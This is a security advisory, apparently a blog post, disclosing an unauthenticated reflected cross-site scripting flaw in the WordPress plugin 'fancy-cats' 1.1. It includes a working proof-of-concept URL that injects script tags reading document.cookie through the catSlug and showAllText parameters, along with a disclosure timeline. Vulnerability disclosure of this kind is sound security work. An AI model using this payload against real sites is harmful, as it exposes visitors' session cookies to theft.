wp-plugin : fancy-cats – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : fancy-cats

 

Effected Version : 1.1 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 
http://localhost/wp-content/plugins/fancy-cats/getCatPosts.php?catSlug=catSlug'><script>alert(document.cookie)</script>&catId=catId&showAllText=showAllText'><script>alert(document.cookie)</script>&

 

Vulnerable Parameter : catSlug, showAllText

 

Type of XSS : Reflected

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-04

 
Plugin Status : Closed
 
Public Disclosure : July 7, 2014
 
CVE Number : Not assigned yet

 
Plugin Description :
 
This is an extended categories widget.

When the user clicks on a category from the widget, rather than loading a page with all of the posts in that category, a space will expand within the widget, showing the titles of all posts in that category.

There are several configurable settings, so that the widget will fit in with the look and feel of your blog. You can set:

* A limit on the height of the expanded area, so that a scroll bar will show if you have lots of posts in a category
* The indentation of the post items
* The title text, the instructional text, and the 'show all' text

The expanding/collapsing of category post lists is done via AJAX, so the entire page doesn't have to continuously reload to perform the operation.

If there is an extra feature you would like added, or something that you don't like and want to be able to change yourself, contact me and I will see about adding it in the next version.

Leave a Reply

Your email address will not be published. Required fields are marked *